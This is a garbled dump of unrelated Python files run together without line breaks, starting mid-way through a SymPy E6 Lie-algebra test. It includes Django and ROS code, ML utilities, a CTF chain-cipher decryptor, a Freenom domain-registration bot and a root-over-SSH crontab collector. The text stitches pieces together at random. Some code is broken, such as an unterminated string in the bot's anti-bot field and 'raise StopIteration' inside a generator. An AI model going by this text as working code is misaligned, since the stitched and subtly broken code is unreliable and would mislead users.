0, 0, 0, 0, 0, 0]]), Matrix([[0, -1, 1, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 
-1, 1, 0, 0, 0, 0]]), Matrix([[0, 0, 0, -1, 1, 0, 0, 0]]), Matrix([[1, 1, 0, 0, 0, 0, 0, 0]]), ] fw = E6.fundamental_weights[0] assert fw.basis == Basis.ORTHO assert E6.to_omega(fw) == Matrix([[1, 0, 0, 0, 0, 0]]) # baseclass generated assert E6.cartan_matrix == Matrix([ [2, -1, 0, 0, 0, 0], [-1, 2, -1, 0, 0, 0], [0, -1, 2, -1, 0, -1], [0, 0, -1, 2, -1, 0], [0, 0, 0, -1, 2, 0], [0, 0, -1, 0, 0, 2]]) assert E6.omega_matrix == Matrix( [[0, 0, 0, 0, 0, Rational(-2, 3), Rational(-2, 3), Rational(2, 3)], [Rational(-1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(-5, 6), Rational(-5, 6), Rational(5, 6)], [0, 0, 1, 1, 1, -1, -1, 1], [0, 0, 0, 1, 1, Rational(-2, 3), Rational(-2, 3), Rational(2, 3)], [0, 0, 0, 0, 1, Rational(-1, 3), Rational(-1, 3), Rational(1, 3)], [Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(-1, 2), Rational(-1, 2), Rational(1, 2)], ]) assert E6.metric_tensor == Matrix( [[Rational(4, 3), Rational(5, 3), 2, Rational(4, 3), Rational(2, 3), 1], [Rational(5, 3), Rational(10, 3), 4, Rational(8, 3), Rational(4, 3), 2], [2, 4, 6, 4, 2, 3], [Rational(4, 3), Rational(8, 3), 4, Rational(10, 3), Rational(5, 3), 2], [Rational(2, 3), Rational(4, 3), 2, Rational(5, 3), Rational(4, 3), 1], [1, 2, 3, 2, 1, 2], ]) # backend assert [E6.to_omega(x) for x in E6.root_system()] == [ Matrix([[0, 0, 0, 0, 0, 1]]), Matrix([[0, 0, 1, 0, 0, -1]]), Matrix([[0, 1, -1, 1, 0, 0]]), Matrix([[0, 1, 0, -1, 1, 0]]), Matrix([[1, -1, 0, 1, 0, 0]]), Matrix([[-1, 0, 0, 1, 0, 0]]), Matrix([[0, 1, 0, 0, -1, 0]]), Matrix([[1, -1, 1, -1, 1, 0]]), Matrix([[-1, 0, 1, -1, 1, 0]]), Matrix([[1, -1, 1, 0, -1, 0]]), Matrix([[1, 0, -1, 0, 1, 1]]), Matrix([[-1, 0, 1, 0, -1, 0]]), Matrix([[-1, 1, -1, 0, 1, 1]]), Matrix([[1, 0, -1, 1, -1, 1]]), Matrix([[1, 0, 0, 0, 1, -1]]), Matrix([[-1, 1, -1, 1, -1, 1]]), Matrix([[-1, 1, 0, 0, 1, -1]]), Matrix([[0, -1, 0, 0, 1, 1]]), Matrix([[1, 0, 0, -1, 0, 1]]), Matrix([[1, 0, 0, 1, -1, -1]]), Matrix([[-1, 1, 0, -1, 0, 1]]), Matrix([[-1, 1, 0, 1, -1, -1]]), Matrix([[0, -1, 0, 1, -1, 1]]), Matrix([[0, -1, 1, 0, 1, -1]]), Matrix([[1, 0, 1, -1, 0, -1]]), Matrix([[-1, 1, 1, -1, 0, -1]]), Matrix([[0, -1, 1, -1, 0, 1]]), Matrix([[0, -1, 1, 1, -1, -1]]), Matrix([[0, 0, -1, 1, 1, 0]]), Matrix([[1, 1, -1, 0, 0, 0]]), Matrix([[-1, 2, -1, 0, 0, 0]]), Matrix([[0, -1, 2, -1, 0, -1]]), Matrix([[0, 0, -1, 0, 0, 2]]), Matrix([[0, 0, -1, 2, -1, 0]]), Matrix([[0, 0, 0, -1, 2, 0]]), Matrix([[2, -1, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[-2, 1, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 1, -2, 0]]), Matrix([[0, 0, 1, -2, 1, 0]]), Matrix([[0, 0, 1, 0, 0, -2]]), Matrix([[0, 1, -2, 1, 0, 1]]), Matrix([[1, -2, 1, 0, 0, 0]]), Matrix([[-1, -1, 1, 0, 0, 0]]), Matrix([[0, 0, 1, -1, -1, 0]]), Matrix([[0, 1, -1, -1, 1, 1]]), Matrix([[0, 1, -1, 1, 0, -1]]), Matrix([[1, -1, -1, 1, 0, 1]]), Matrix([[-1, 0, -1, 1, 0, 1]]), Matrix([[0, 1, -1, 0, -1, 1]]), Matrix([[0, 1, 0, -1, 1, -1]]), Matrix([[1, -1, 0, -1, 1, 1]]), Matrix([[1, -1, 0, 1, 0, -1]]), Matrix([[-1, 0, 0, -1, 1, 1]]), Matrix([[-1, 0, 0, 1, 0, -1]]), Matrix([[0, 1, 0, 0, -1, -1]]), Matrix([[1, -1, 0, 0, -1, 1]]), Matrix([[1, -1, 1, -1, 1, -1]]), Matrix([[-1, 0, 0, 0, -1, 1]]), Matrix([[-1, 0, 1, -1, 1, -1]]), Matrix([[1, -1, 1, 0, -1, -1]]), Matrix([[1, 0, -1, 0, 1, 0]]), Matrix([[-1, 0, 1, 0, -1, -1]]), Matrix([[-1, 1, -1, 0, 1, 0]]), 
Matrix([[1, 0, -1, 1, -1, 0]]), Matrix([[-1, 1, -1, 1, -1, 0]]), Matrix([[0, -1, 0, 0, 1, 0]]), Matrix([[1, 0, 0, -1, 0, 0]]), Matrix([[-1, 1, 0, -1, 0, 0]]), Matrix([[0, -1, 0, 1, -1, 0]]), Matrix([[0, -1, 1, -1, 0, 0]]), Matrix([[0, 0, -1, 0, 0, 1]]), Matrix([[0, 0, 0, 0, 0, -1]]), ] assert [E6.to_omega(x) for x in E6.positive_roots] == [ Matrix([[0, 0, 0, 0, 0, 1]]), Matrix([[0, 0, 1, 0, 0, -1]]), Matrix([[0, 1, -1, 1, 0, 0]]), Matrix([[0, 1, 0, -1, 1, 0]]), Matrix([[1, -1, 0, 1, 0, 0]]), Matrix([[-1, 0, 0, 1, 0, 0]]), Matrix([[0, 1, 0, 0, -1, 0]]), Matrix([[1, -1, 1, -1, 1, 0]]), Matrix([[-1, 0, 1, -1, 1, 0]]), Matrix([[1, -1, 1, 0, -1, 0]]), Matrix([[1, 0, -1, 0, 1, 1]]), Matrix([[-1, 0, 1, 0, -1, 0]]), Matrix([[-1, 1, -1, 0, 1, 1]]), Matrix([[1, 0, -1, 1, -1, 1]]), Matrix([[1, 0, 0, 0, 1, -1]]), Matrix([[-1, 1, -1, 1, -1, 1]]), Matrix([[-1, 1, 0, 0, 1, -1]]), Matrix([[0, -1, 0, 0, 1, 1]]), Matrix([[1, 0, 0, -1, 0, 1]]), Matrix([[1, 0, 0, 1, -1, -1]]), Matrix([[-1, 1, 0, -1, 0, 1]]), Matrix([[-1, 1, 0, 1, -1, -1]]), Matrix([[0, -1, 0, 1, -1, 1]]), Matrix([[0, -1, 1, 0, 1, -1]]), Matrix([[1, 0, 1, -1, 0, -1]]), Matrix([[-1, 1, 1, -1, 0, -1]]), Matrix([[0, -1, 1, -1, 0, 1]]), Matrix([[0, -1, 1, 1, -1, -1]]), Matrix([[0, 0, -1, 1, 1, 0]]), Matrix([[1, 1, -1, 0, 0, 0]]), Matrix([[-1, 2, -1, 0, 0, 0]]), Matrix([[0, -1, 2, -1, 0, -1]]), Matrix([[0, 0, -1, 0, 0, 2]]), Matrix([[0, 0, -1, 2, -1, 0]]), Matrix([[0, 0, 0, -1, 2, 0]]), Matrix([[2, -1, 0, 0, 0, 0]]), ] def calculate_aspect_ratio(x_input: object, y_input: object) -> object: lcf = 2 x_odd = y_odd = False if x_input % 3 == 0: x_odd = True if y_input % 3 == 0: y_odd = True if x_odd * y_odd: lcf = 3 num: int num = hcf = 1 while (x_input // (num * lcf)) >= 1: factor = (num * lcf) if x_input % factor == 0 and y_input % factor == 0: hcf = factor num += 1 return x_input // hcf, y_input // hcf 0 # Main Molecular dynamics simulation loop import os import md import ase.io from read_mp_project import read_mp_properties def main(): # read in the .json file as an command line argument? 
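# Aside on calculate_aspect_ratio() defined above: it reduces a resolution to its simplest
# integer ratio. A much shorter sketch of the same goal using the standard library
# (illustrative only, not a drop-in replacement for the original lcf heuristic):
from math import gcd

def aspect_ratio(x, y):
    d = gcd(x, y)
    return x // d, y // d

assert aspect_ratio(1920, 1080) == (16, 9)
assert aspect_ratio(1280, 1024) == (5, 4)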
mp_properties = read_mp_properties('test_120_materials.json') # try to create folder 'property_calculations' # if it already exists, continue with the program try: os.mkdir('property_calculations') except: pass # primary loop for MD try: for id, cif in enumerate(mp_properties['cif']): f = open("tmp_cif.cif", "w+") f.write(cif) f.close() atoms = ase.io.read("tmp_cif.cif", None) print("\n \n \nRUNNING MOLECULAR DYNAMICS") try: md.run_md(atoms, str(id)) except Exception as e: print("\n ERROR IN RUNNING MD \n") print("Exception: ", e) os.remove("tmp_cif.cif") except KeyboardInterrupt: pass if __name__ == "__main__": main() subt/ros/base/src/compass.py10-100 import math import pdb import serial import time import os class Compass(): def __init__(self): self.port = serial.Serial("/dev/ttyUSB0",baudrate=19200,timeout=5) self.lastCompass = -1 def update(self): self.port.write(b"\x55\xC1\x02\x02") data1 = self.port.read() data2 = self.port.read() value = ord(data1) * 256 + ord(data2) self.lastCompass = value return value src/ribo_api/router.py0 from django.conf.urls import url, include from rest_framework import routers from ribo_api.views import UserViewSet from ribo_api.views.api.events import EventViewSet from ribo_api.views.api.task import TaskViewSet from ribo_api.views.auth import AuthViewSet router = routers.SimpleRouter(trailing_slash=False) router.register(r'auth', AuthViewSet, base_name='AuthView') router.register(r'user', UserViewSet, base_name='UserView') router.register(r'task', TaskViewSet, base_name='TaskView') router.register(r'event', EventViewSet, base_name='EventView') urlpatterns = [ url(r'^', include(router.urls)), ] Strubbl/map-machine """ Automate OpenStreetMap wiki editing. """ import re from pathlib import Path from typing import Optional from map_machine.doc.collections import Collection from map_machine.map_configuration import MapConfiguration from map_machine.osm.osm_reader import Tags from map_machine.pictogram.icon import Icon, ShapeExtractor from map_machine.scheme import Scheme from map_machine.workspace import Workspace WORKSPACE: Workspace = Workspace(Path("temp")) SCHEME: Scheme = Scheme.from_file(WORKSPACE.DEFAULT_SCHEME_PATH) EXTRACTOR: ShapeExtractor = ShapeExtractor( WORKSPACE.ICONS_PATH, WORKSPACE.ICONS_CONFIG_PATH ) HEADER_PATTERN: re.Pattern = re.compile("==?=?.*==?=?") HEADER_2_PATTERN: re.Pattern = re.compile("== .* ==") HEADER_PATTERNS: list[re.Pattern] = [ re.compile("==\\s*Example.*=="), re.compile("==\\s*See also\\s*=="), ] RENDERING_HEADER_PATTERN: re.Pattern = re.compile("==\\s*Rendering.*==") ROENTGEN_HEADER_PATTERN: re.Pattern = re.compile("===.*Röntgen.*===") class WikiTable: """SVG table with icon combinations.""" def __init__(self, collection: Collection, page_name: str): self.collection: Collection = collection self.page_name: str = page_name def generate_wiki_table(self) -> tuple[str, list[Icon]]: """ Generate Röntgen icon table for the OpenStreetMap wiki page. """ icons: list[Icon] = [] text: str = '{| class="wikitable"\n' if self.collection.column_key is not None: text += f"! {{{{Key|{self.collection.column_key}}}}}" else: text += "! Tag || Icon" if self.collection.row_tags: text += "\n" for current_tags in self.collection.row_tags: text += "|-\n" text += "| " if current_tags: for key, value in current_tags.items(): if value == "*": text += f"{{{{Key|{key}}}}}
    " else: text += f"{{{{Tag|{key}|{value}}}}}
    " text = text[:-6] text += "\n" icon, _ = SCHEME.get_icon( EXTRACTOR, current_tags | self.collection.tags, set(), MapConfiguration(ignore_level_matching=True), ) icons.append(icon.main_icon) text += ( "| " f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n" ) text += "|}\n" return text, icons if not self.collection.column_values: self.collection.column_values = [""] else: make_vertical: bool = False for column_value in self.collection.column_values: if column_value and len(column_value) > 2: make_vertical = True for column_value in self.collection.column_values: text += " ||" if column_value: tag: str = ( f"{{{{TagValue|" f"{self.collection.column_key}|{column_value}}}}}" ) text += " " + ( f"{{{{vert header|{tag}}}}}" if make_vertical else tag ) text += "\n" for row_value in self.collection.row_values: text += "|-\n" if row_value: text += f"| {{{{Tag|{self.collection.row_key}|{row_value}}}}}\n" else: text += "|\n" for column_value in self.collection.column_values: current_tags: Tags = dict(self.collection.tags) | { self.collection.row_key: row_value } if column_value: current_tags |= {self.collection.column_key: column_value} icon, _ = SCHEME.get_icon(EXTRACTOR, current_tags, set()) if not icon: print("Icon was not constructed.") text += ( "| " f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n" ) icons.append(icon.main_icon) text += "|}\n" return text, icons def generate_new_text( old_text: str, table: WikiTable, ) -> tuple[Optional[str], list[Icon]]: """ Generate Röntgen icon table for the OpenStreetMap wiki page. :param old_text: previous wiki page text :param table: wiki table generator :return: new wiki page text """ wiki_text: str icons = [] if table.collection.row_key or table.collection.row_tags: wiki_text, icons = table.generate_wiki_table() else: processed = set() icon, _ = SCHEME.get_icon( EXTRACTOR, table.collection.tags, processed, MapConfiguration() ) if not icon.main_icon.is_default(): wiki_text = ( f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n" ) icons.append(icon.main_icon) elif icon.extra_icons: wiki_text = ( f"Röntgen icon set has additional icon for the tag: " f"[[Image:Röntgen {icon.extra_icons[0].get_name()}.svg|32px]]." f"\n" ) icons.append(icon.extra_icons[0]) else: wiki_text = "" lines: list[str] = old_text.split("\n") # If rendering section already exists. start: Optional[int] = None end: int = -1 for index, line in enumerate(lines): if HEADER_2_PATTERN.match(line): if start is not None: end = index break if RENDERING_HEADER_PATTERN.match(line): start = index if start is not None: return ( "\n".join(lines[: start + 2]) + "\n=== [[Röntgen]] icons in [[Map Machine]] ===\n" + f"\n{wiki_text}\n" + "\n".join(lines[end:]) ), icons # If Röntgen rendering section already exists. start: Optional[int] = None end: int = -1 for index, line in enumerate(lines): if HEADER_PATTERN.match(line): if start is not None: end = index break if ROENTGEN_HEADER_PATTERN.match(line): start = index if start is not None: return ( "\n".join(lines[: start + 2]) + f"\n{wiki_text}\n" + "\n".join(lines[end:]) ), icons # Otherwise. 
headers: list[Optional[int]] = [None, None] for index, line in enumerate(lines): for i, pattern in enumerate(HEADER_PATTERNS): if pattern.match(line): headers[i] = index filtered = list(filter(lambda x: x is not None, headers)) header: int if filtered: header = filtered[0] else: lines += [""] header = len(lines) return ( "\n".join(lines[:header]) + "\n== Rendering ==\n\n=== [[Röntgen]] icons in [[Map Machine]] " "===\n\n" + wiki_text + "\n" + "\n".join(lines[header:]) ), icons 2020_2021/Training_2/Chain/solution/chain_encryption.py0 def encrypt(text, iv): result = b"" current_key = iv for char in text: result += bytes([(char + current_key) % 256]) current_key = (char + current_key) % 256 return result def decrypt(text, iv): result = b"" last_key = iv current_key = iv for char in text: t = (char - current_key) % 256 result += bytes([t]) current_key = (current_key + t) % 256 return result if __name__ == "__main__": iv = int(input("Enter initial chain value >> ")) % 256 encrypted = open("encrypted.txt", 'rb').read() decrypted = decrypt(encrypted, iv) print(decrypted)""" design a system to shuffle music, given a list, shuffle songs and return in a new list ["I love you","Bieber", "Little girl"] How random can it be? """ import random def swap_order(songs,left,right): while left < right: temp = songs[left] songs[left] = songs[right] songs[right] = temp left += 1 right -= 1 return songs def swap_with_center(songs, center): mid = int(len(songs) / 2) # if center < mid, swap only between 0..mid if center < mid: return swap_order(songs,0,center) # if center == mid, swap between 0..len(songs) if center == mid: return swap_order(songs,0,len(songs)-1) # if center > mid, swap only between mid..len(songs) if center > mid: return swap_order(songs,mid,len(songs)-1) def shuffle_music(songs): # get the random index from [0, len(songs)) rand = random.randrange(0,len(songs)) # set this index as a pivot which will swap all the right and left elements print(rand) return swap_with_center(songs, rand) songs = ["I love you","Bieber", "mucho", "Hello","starboy","Little girl"] print(shuffle_music(songs)) app/__init__.py from sanic import Sanic from sanic_cors import CORS from app.cpu.controllers import cpu_module from app.disk.controllers import disk_module from app.main.controllers import main_module from app.network.controllers import network_module from app.os.controllers import os_module from app.ram.controllers import ram_module app = Sanic() CORS(app) app.config.from_object('config') # Register blueprints app.register_blueprint(cpu_module) app.register_blueprint(disk_module) app.register_blueprint(main_module) app.register_blueprint(network_module) app.register_blueprint(os_module) app.register_blueprint(ram_module) maartenelgar/Block_Fund_Trading__init__.pypirc.py [distutils] index-servers = pypi [pypi] username: password: #! 
/usr/bin/env python3 from pathlib import Path import torch from torch import nn import blobconverter class CatImgs(nn.Module): def forward(self, img1, img2, img3): return torch.cat((img1, img2, img3), 3) # Define the expected input shape (dummy input) shape = (1, 3, 300, 300) X = torch.ones(shape, dtype=torch.float32) path = Path("out/") path.mkdir(parents=True, exist_ok=True) onnx_file = "out/concat.onnx" print(f"Writing to {onnx_file}") torch.onnx.export( CatImgs(), (X, X, X), onnx_file, opset_version=12, do_constant_folding=True, input_names = ['img1', 'img2', 'img3'], # Optional output_names = ['output'], # Optional ) # No need for onnx-simplifier here # Use blobconverter to convert onnx->IR->blob blobconverter.from_onnx( model=onnx_file, data_type="FP16", shaves=6, use_cache=False, output_dir="../models", optimizer_params=[] )ducu/rqrq/suspension.py WORKERS_SUSPENDED = 'rq:suspended' def is_suspended(connection): return connection.exists(WORKERS_SUSPENDED) def suspend(connection, ttl=None): """ttl = time to live in seconds. Default is no expiration Note: If you pass in 0 it will invalidate right away """ connection.set(WORKERS_SUSPENDED, 1) if ttl is not None: connection.expire(WORKERS_SUSPENDED, ttl) def resume(connection): return connection.delete(WORKERS_SUSPENDED)reteps/freenom-register #!/usr/bin/env python3 import requests, sys from bs4 import BeautifulSoup class FreenomError(Exception): pass class Freenom(object): def __init__(self): self.session = requests.Session() def login(self, email, password): url = "https://my.freenom.com/dologin.php" payload = {'token': self.get_token('https://my.freenom.com/clientarea.php'), 'username': email, 'password': password} r = self.session.post(url, payload, headers={'Host': 'my.freenom.com', 'Referer': 'https://my.freenom.com/clientarea.php'}) if r.status_code != 200: raise FreenomError(f"Could not reach {url}") elif 'Hello' not in r.text: raise FreenomError("Email or password is incorrect.") def is_available(self, domain): payload = { 'domain':domain.split(".")[0], 'tld':domain.split(".")[1] } r = self.session.post("https://my.freenom.com/includes/domains/fn-available.php", payload, headers={'Host': 'my.freenom.com', 'Referer': 'https://my.freenom.com/domains.php'}).json()['top_domain'] return r["status"] == "AVAILABLE" and r["type"] == "FREE" def get_token(self, url): return self.session.get(url).text.split('name="token" value="',2)[1].split('"',1)[0] def register_domain(self, domain): self.domain = domain self.add_to_cart() self.checkout() def add_to_cart(self): url = "https://my.freenom.com/includes/domains/confdomain-update.php" if not self.is_available(self.domain): raise FreenomError("Domain is not available.") payload = { 'domain': self.domain, 'period': '12M' } r = self.session.post(url, payload, headers={'Host': 'my.freenom.com', 'Referer': 'https://my.freenom.com/cart.php?a=confdomains'}).json() if r["status"] != "OK": raise FreenomError("Something went wrong.") def checkout(self): token = self.get_token("https://my.freenom.com/cart.php?a=confdomains") periodName = self.domain.split(".")[0] + "_" + self.domain.split(".")[1] + "_period" payload = { "token": token, "update": "true", periodName: "12M", "idprotection[0]":"on", "domainns1":"ns01.freenom.com", "domainns2":"ns02.freenom.com", "domainns3":"ns03.freenom.com", "domainns4":"ns04.freenom.com", "domainns5":"" } r = self.session.post("https://my.freenom.com/cart.php?a=confdomains", payload, headers={'Host': 'my.freenom.com', 'Referer': 
'https://my.freenom.com/cart.php?a=confdomains'}) soup = BeautifulSoup(r.text,"lxml") form = soup.find("form", {"id":"mainfrm"}).findAll("input") skipValues = ["accepttos", "fpbb"] # generate fpbb value with https://repl.it/repls/FamousVoluminousDesigners fpbb = " payload = { "accepttos": "on", "token": token, "country": "US", "fpbb": fpbb, } for value in form: if value.get("name") in skipValues or value.get("name") == None: continue payload[value.get("name")] = value.get("value") r = self.session.post("https://my.freenom.com/cart.php?a=checkout", payload, headers={'Host': 'my.freenom.com', 'Referer': 'https://my.freenom.com/cart.php?a=checkout'}) if "Your Order Number is:" not in r.text: raise FreenomError("Registering the domain was unsuccessful. You may of been banned.") if __name__ == '__main__': if len(sys.argv) != 4: print("usage: freenom EMAIL PASSWORD DOMAIN") exit() freenom = Freenom() freenom.login(sys.argv[1], sys.argv[2]) freenom.register_domain(sys.argv[3]) josueischiu12/parqueopython from django.db import models from phonenumber_field.modelfields import PhoneNumberField class Cliente(models.Model): """Informacion del cliente.""" nombre = models.CharField(max_length=60) apellido = models.CharField(max_length=60) tax_id = models.TextField(blank=True, default="C/F") direccion = models.TextField(blank=True, default="Ciudad") telefono = PhoneNumberField(blank=True) email = models.EmailField(blank=True) def __str__(self): return self.nombre + " " + self.apellido import tensorflow as tf def partitionfunc(n, partition_length, unit_of_num_in_partition=1, min_num_in_partition=None): ''' got idea from https://stackoverflow.com/a/18503391 n is the integer to partition, k is the length of partitions, l is the min partition element size ''' min_length = 1 assert n % unit_of_num_in_partition == 0 if min_num_in_partition is None: min_num_in_partition = unit_of_num_in_partition assert min_num_in_partition % unit_of_num_in_partition == 0 if partition_length < min_length: raise StopIteration if partition_length == min_length: if n >= min_num_in_partition: yield (n,) raise StopIteration # i means minimum number of a specific result partition. for i in range(min_num_in_partition, n + 1, unit_of_num_in_partition): for result in partitionfunc(n - i, partition_length - 1, unit_of_num_in_partition, min_num_in_partition=i): yield (i,) + result def _round_to_multiple_of(val, divisor, round_up_bias=0.9): """ round function which have same behavior in python2 and python3. 
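For example, with the default round_up_bias of 0.9 (values worked by hand): _round_to_multiple_of(47, 8) == 48, while _round_to_multiple_of(10, 8) == 16, because rounding 10 down to 8 would lose more than 10% of the value.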
from https://github.com/pytorch/vision/blob/78ed10cc51067f1a6bac9352831ef37a3f842784/torchvision/models/mnasnet.py#L68 """ assert 0.0 <= round_up_bias < 1.0 new_val = max(divisor, int(val + divisor / 2.0) // divisor * divisor) return new_val if new_val >= round_up_bias * val else new_val + divisor def round_to_multiple_of(val, divisor=1): return _round_to_multiple_of(val, divisor, round_up_bias=0.0) def argmax(l): # from https://towardsdatascience.com/there-is-no-argmax-function-for-python-list-cd0659b05e49 f = lambda i: l[i] return max(range(len(l)), key=f) def ceil_div(num, divisor): return (num + divisor - 1) // divisor def linear(x, start_x, start_y, end_x, end_y): x = tf.cast(x, tf.float32) return ((x - start_x) / (end_x - start_x)) * (end_y - start_y) + start_y def smooth_square(x, start_x, start_y, end_x, end_y): x = tf.cast(x, tf.float32) x_normalized = (x - start_x) / (end_x - start_x) left_square = 2 * x_normalized ** 2 right_square = 1 - 2 * (1 - x_normalized) ** 2 square = tf.cond(x_normalized <= 0.5, lambda: left_square, lambda: right_square) return square * (end_y - start_y) + start_y#!/usr/bin/env python3 # Copyright (c) 2020 The Plankton Authors. # All rights reserved. # # This source code is derived from UUV Simulator # (https://github.com/uuvsimulator/uuv_simulator) # Copyright (c) 2016-2019 The UUV Simulator Authors # licensed under the Apache license, Version 2.0 # cf. 3rd-party-licenses.txt file in the root directory of this source tree. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
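# Note on partitionfunc() defined above: under Python 3.7+ (PEP 479) an explicit
# `raise StopIteration` inside a generator surfaces as RuntimeError, so the helper needs
# `return` instead. A minimal corrected sketch of the same idea (hypothetical name), which
# enumerates non-decreasing integer partitions of n with a fixed length:
def fixed_length_partitions(n, length, step=1, minimum=None):
    minimum = step if minimum is None else minimum
    if length < 1:
        return
    if length == 1:
        if n >= minimum:
            yield (n,)
        return
    for i in range(minimum, n + 1, step):
        for rest in fixed_length_partitions(n - i, length - 1, step, minimum=i):
            yield (i,) + rest

assert list(fixed_length_partitions(6, 3)) == [(1, 1, 4), (1, 2, 3), (2, 2, 2)]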
import traceback import threading import rclpy import sys from numpy import pi from uuv_world_ros_plugins_msgs.srv import * from plankton_utils.time import time_in_float_sec from plankton_utils.time import is_sim_time def main(): rclpy.init() sim_time_param = is_sim_time() node = rclpy.create_node( 'set_timed_current_perturbation', allow_undeclared_parameters=True, automatically_declare_parameters_from_overrides=True, parameter_overrides=[sim_time_param]) node.get_logger().info('Starting current perturbation node') node.get_logger().info('Programming the generation of a current perturbation') starting_time = 0.0 if node.has_parameter('starting_time'): starting_time = node.get_parameter('starting_time').value if starting_time < 0.0: node.get_logger().warn('Negative starting time, setting it to 0.0') starting_time = 0.0 node.get_logger().info('Starting time={} s'.format(starting_time)) end_time = -1 if node.has_parameter('end_time'): end_time = node.get_parameter('end_time').value if end_time > 0 and end_time <= starting_time: raise RuntimeError('End time is smaller than the starting time') node.get_logger().info('End time=%s' % (end_time if end_time > 0 else 'Inf.')) vel = 0.0 if node.has_parameter('current_velocity'): vel = float(node.get_parameter('current_velocity').value) node.get_logger().info('Current velocity [m/s]={}'.format(vel)) horz_angle = 0.0 if node.has_parameter('horizontal_angle'): horz_angle = float(node.get_parameter('horizontal_angle').value) horz_angle *= pi / 180 node.get_logger().info('Current horizontal angle [deg]={}'.format( horz_angle * 180 / pi)) vert_angle = 0.0 if node.has_parameter('vertical_angle'): vert_angle = float(node.get_parameter('vertical_angle').value) vert_angle *= pi / 180 node.get_logger().info('Current vertical angle [deg]={}'.format(horz_angle * 180 / pi)) # Create client service srv_name = '/hydrodynamics/set_current_velocity' set_current = node.create_client(SetCurrentVelocity, srv_name) if not set_current.wait_for_service(timeout_sec=20): node.get_logger().error('%s service not available! Closing node...' %(srv_name)) sys.exit(-1) # Wait to set the current model FREQ = 100 rate = node.create_rate(FREQ) thread = threading.Thread(target=rclpy.spin, args=(node,), daemon=True) thread.start() # Make sure the clock has been updated when using sim time while node.get_clock().now() == rclpy.time.Time(clock_type=node.get_clock().clock_type): pass while time_in_float_sec(node.get_clock().now()) < starting_time: if 1.0 / FREQ < starting_time: rate.sleep() node.get_logger().info('Applying current model...') req = SetCurrentVelocity.Request() req.velocity = vel req.horizontal_angle = horz_angle req.vertical_angle = vert_angle future = set_current.call_async(req) # NB : spining is done from another thread while not future.done(): pass try: response = future.result() except Exception as e: node.get_logger().error('Service call ' + srv_name + ' failed, error=' + repr(e)) else: if response.success: t = time_in_float_sec(node.get_clock().now()) node.get_logger().info('Current velocity changed successfully at %f s! 
vel= %f m/s' % (t, vel)) else: node.get_logger().error('Service call ' + srv_name + ' return a "failed" value') # Returning to previous state if end_time > 0: while time_in_float_sec(node.get_clock().now()) < end_time: if 1.0 / FREQ < end_time: rate.sleep() req.velocity = 0.0 req.horizontal_angle = horz_angle req.vertical_angle = vert_angle node.get_logger().info('TIMEOUT, setting current velocity to zero...') future = set_current.call_async(req) # NB : spining is done from another thread while not future.done(): pass try: response = future.result() except Exception as e: node.get_logger().error('Service call ' + srv_name + ' failed, error=' + repr(e)) node.get_logger().info('Leaving node...') node.destroy_node() rclpy.shutdown() thread.join() # ============================================================================= if __name__ == '__main__': try: main() except Exception as e: print('Something went wrong: ' + repr(e)) print(traceback.print_exc()) finally: if rclpy.ok(): rclpy.shutdown() numbers = [int(num) for num in input().split(", ")] boundary = 10 while numbers: current_list = [] index = 0 while index < len(numbers): num = numbers[index] if num <= boundary: current_list.append(num) numbers.remove(numbers[index]) continue index += 1 print(f"Group of {boundary}'s: {current_list}") boundary += 10 def get_all_sentiment_data(doc, lemma_doc): print("") print("========= Sentiment Analysis (Working) ==============") print(f"{doc._.polarity} {lemma_doc._.polarity}") print(f"{doc._.subjectivity} {lemma_doc._.subjectivity}") print(f"{doc._.assessments} {lemma_doc._.assessments}") def get_sentiment(sent): return sent._.polarity, sent._.subjectivity, sent._.assessments #!python # -*- coding: iso-8859-1 -*- import datetime import py from ll.xist import xsc from ll.xist.ns import xml, html, meta codetemplate = """ import os base = %r crontabs = os.listdir(base) channel.send(len(crontabs)) for file in crontabs: channel.send((file, os.popen('crontab -u %%s -l' %% file).read())) """ class Host(object): def __init__(self, name, dir="/var/spool/cron/crontabs", python="python2.4"): self.name = name self.dir = dir self.python = python def getcrontabs(self): code = py.code.Source(codetemplate % self.dir) gateway = py.execnet.SshGateway("root@%s" % self.name, remotepython=self.python) channel = gateway.remote_exec(code) count = channel.receive() for i in xrange(count): yield channel.receive() gateway.exit() hosts = [ Host("host1.example.com"), Host("host2.example.org"), Host("host3.example.net"), ] style = """ body { margin: 0; padding: 0; background-color: #fff; color: #000; } .note { font-size: 13px; } h1, h2, h3 { color: #0063a8; font-family: "Trebuchet MS", sans-serif; font-weight: normal; } h1 { font-size: 30px; color: #fff; background-color: #0063a8; padding: 8px 30px; } h2 { font-size: 20px; margin: 30px 30px -10px 30px; } h3 { font-size: 14px; margin: 20px 30px 2px 30px; } pre { margin: 0px 30px 10px 30px; font-size: 11px; line-height: 18px; border: 1px solid #eee; background-color: #fafafa; padding: 1px 5px 2px 5px; overflow: auto; } """ now = datetime.datetime.now() node = xsc.Frag(html.h1("Cronjobs ", html.span("(generated at %s)" % now.strftime("%d.%m.%Y %H:%M"), class_="note"))) for host in hosts: node.append(html.h2(host.name)) for (user, crontab) in sorted(host.getcrontabs()): node.append(html.h3(user, "@", host.name)) node.append(html.pre(crontab.decode("latin-1").strip())) node = xsc.Frag( xml.XML10(), "\n", html.head( meta.contenttype(), html.title("Cronjobs"), html.style(style, 
